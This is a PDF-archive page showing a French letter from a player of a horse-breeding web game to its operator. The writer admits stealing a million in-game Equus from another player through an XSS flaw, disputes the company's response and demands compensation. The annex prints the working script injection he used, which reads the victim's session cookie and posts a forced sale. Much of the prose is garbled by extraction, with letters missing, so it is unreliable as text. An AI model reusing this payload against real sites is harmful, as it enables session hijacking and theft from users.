PDF Archive

Easily share your PDF documents with your contacts, on the Web and Social Networks.

Send a file File manager PDF Toolbox Search Help Contact


c0bfa493cb8a889e356362b7efa6595b56313a8322007 .pdf



Original filename: c0bfa493cb8a889e356362b7efa6595b56313a8322007.pdf

This PDF 1.4 document has been generated by Online2PDF.com, and has been sent on pdf-archive.com on 21/02/2016 at 18:27, from IP address 82.236.x.x. The current document download page has been viewed 157 times.
File size: 142 KB (3 pages).
Privacy: public file





Document preview


Bonjour,

Je vous ai récemment contacté au sujet des scripts/bots le 15 octobre 2015.
Je e pe ets aujou d’hui de vous o ta te au sujet d’u e histoi e uel ues peu plus importants.
N'ayant reçu qu'une réponse me semblant être un copier/coller, quoi que légèrement revu, de mon
message précédent, je ’ai pas u o de vous e o ta te au sujet d’u e faille ss asi d ouve te
dans le jeu.

J’ai do
hoisi une autre façon de me faire remarquer cette fois-ci. En effet, il y a maintenant 1
semaine, le 21 octobre 2015 à 00 :48 :48, j’ai pu fa ile e t saisi Millio d’E uus su un compte
sa s
e ’ o e te ! La joueuse, clemence@ernst ’est d’ailleu s e p ess e de vous
contacter.

Tout d’a o d, je dois avoue a su p ise ua d à la po se ue vous avez fo ul à ette joueuse,
soit, je cite, « Si nous trouvions quelques chose impliquant le joueur Regarde ! sachez que vous serez
sanctionné de la même façon de ce dernier. ». Quelle aberration ! Quelle absurdité ! Quelle
d a he o
e iale ve s uel u’u a a t t victime d’u e faille su vot e jeu et do t vous tes
entièrement responsables !! Prenons un simple exemple. Nous so
es lie ts d’u asi o et
d ido s d’aller te te ot e ha e au poke . Si je o pte les a tes, j’ai de fo te ha e d’être
repéré par le groom et sanctionné par le casino. Pourtant, mon adversaire ne sera nullement
sanctionné, et ce même si il a vu que je comptais les cartes ! On se retrouve dans le même cas de
figu e. Le Casi o est u e e t ep ise, et ous so
es lie ts adve sai es… U e e pli atio su ette
phrase serait la bienvenue. Ou peut- t e s’agit-il tout si ple e t d’u
ale te du !

« Depuis vot e

essage, ous e he ho s les failles u’il pou ait avoi su le jeu »

Je ne peux en être plus soulagé. Malgré tout, je e o p e ds pas ue ela ’ait pas t fait avant
sur un jeu de cet acabit ! Vous prétendez posséder une communauté de plusieurs millions de
joueurs. Avec un tel nombre de personne, la moindre des choses ne serait-elle pas d’e au he u
pen-tester ? A première vue, cette faille doit fa ile e t date de l’ po ue où Vi e t d veloppait le
jeu. Si je ne me trompe pas, il y a 10 ans ? E plei app e tissage, il est do
o al u’il ait fait u e
erreur si bête. Mais une société comme la vôtre doit facilement se douter des différentes attaques
dont-elle peut être victime ss, s l, ddos … et e dev ait-elle pas redouble d’atte tio su ellesci ? Mon but est juste de ti e u e so ette d’ala e.

« Par ailleurs, nous ne sommes pas sûr de comprendre pour quelle raison vous nous demandez un
d do
age e t … ». So to s do de l’âge de pie e ! Certaines entreprises comme Google,
Firefox débourseraient des millions à toutes personnes qui leur rapporteraient une faille de sécurité.
Ce tes, elle e l’a pas e pli ite e t fait, ais elle vous a donné du pai
it … Passo s.

« D’u ôt vous ne souhaitez pas nous fournir de preuves selo les uelles uel u’u se se ait
connecté à votre partie ». H . H . Je ’ touffe là. Cha ue a gu e t ue vous do ez est plus
aberrant que le précédent ! Comment cette personne serait-elle donc en mesure de vous donner des
p euves ue uel u’u s’est o e t su so o pte ? Mis à pa t les elev s d’IP, elle ’a
absolument aucune carte en main qui lui permettait de faire ce que vous lui avez demandé !! Un
dédommagement, en monnaie de jeu, aurait été le geste commercial MINIMUM face au préjudice
moral subit.

« Nous e he ho s les failles […] Nous e avo s effe tive e t o ig u e ais ui e o espo d
pas à la des iptio ue vous faites […] » Un travail de recherche ? Je e l’ai pas vu ! Certes la faille a
été corrigée, mais encore une fois, je ne comprends pas votre inactivité. Sachant le nom du joueur
ui l’a e ploit , pou uoi e pas tout si ple e t ’avoi di e te e t o ta t ? De plus, une simple
recherche dans les messages privés de clemence@ernst vous aurait permis de découvrir le pot au
rose ! Je vous e te ds d jà ve i . U e uestio d’ thi ue ? Vous auriez dans un premier temps pu
de a dez à la joueuse l’auto isatio de o sulte ses essages privées. De plus, d’ap s vos
Co ditio s G
ale d’Utilisatio (« OWLIENT se réserve la possibilité de collecter, conserver et
utiliser vos données personnelles sans votre accord après les avoir anonymisées. ») ils vous étaient
aussi possibles d’a de au essages p iv s de ette joueuse sa s so avis p ala le. E effet,
s’agissa t d’u e faille de cette envergure, il serait resté raisonnable de les consulter. Vous auriez
ainsi pu trouver le lien piégé qui a servi à voler la victime.

Faille XSS et non échappement des quotes
Vous vous e tes tout de
e apide e t e du o pte. Mais je e ’explique pas pourquoi
vous avez tout de même répondu à la joueuse que vous « avez corrigez une faille qui ne correspond
pas à la description que vous faites ». Est-ce à moi, qui ne travaille pas dans le web, de vous rappeler
l’i po ta e et la vul a ilit d’u site fa e à u e faille XSS ? Dans ce cas pourquoi ne pas avoir
réussi à faire le lien entre Equus volé  faille XSS ? En effet, possédant les cookies de la joueuse, il
est fa ile de lui d o e de l’a ge t Voi le ode e a e e . Si e ode est si ple, je ’ai pas esoi
de vous expliquer les potentiels codes malicieux qui auraient pu être exécutés sur un script plus
o ple e ou pas d’ailleu s : Vol de cookies, publication de messages, vol de chevaux, changement
de fiche, vol de do
es pe so el … Et e ’est u’u e liste o e haustive et o
fl hi !

Da s l’atte te de vot e po se su
mes meilleurs sentiments.
Cordialement,
Regarde !

es o

euses uestio , je vous p ie d’ag e l’e p essio de

Annexe :
1. "><script>
2.
3. function getCookie(name){

// Fonction pour retrouver les cookies sessionprod du joueur

4.

var ch = document.cookie.split(";");

5.

var i = 0;

6.

name = name;

7.

while(ch[i].indexOf(name) == -1){

8.

i++;

9.

if(i>ch.length) return 0;

10.

}

11.

return ch[i].substring(name.length+1,ch[i].length);

12. }
13.
14. var cookie = getCookie("sessionprod");
15. if(cookie != 0){
16.

xhttp = new XMLHttpRequest;

17.

xhttp.open("POST", "/marche/vente/prive/doAcheter", true);
// Requête POST

18.
19.

xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.send("a33f892c93=25859568&34f0ad992f=direct&62acbab438"+cookie);
// Paramètres vente cheval + sessionprod

20. }
21.
22. </script>


c0bfa493cb8a889e356362b7efa6595b56313a8322007.pdf - page 1/3
c0bfa493cb8a889e356362b7efa6595b56313a8322007.pdf - page 2/3
c0bfa493cb8a889e356362b7efa6595b56313a8322007.pdf - page 3/3

Download original PDF file





Related documents


PDF Document c0bfa493cb8a889e356362b7efa6595b56313a8322007
PDF Document projet un recap decale
PDF Document la recherche de pokemon go jeu cheat
PDF Document pourquoi les fans et les joueurs approuvent fifa 16
PDF Document je suis une citoyenne du monde
PDF Document les religions sont elles des sectes qui ont reussi


Related keywords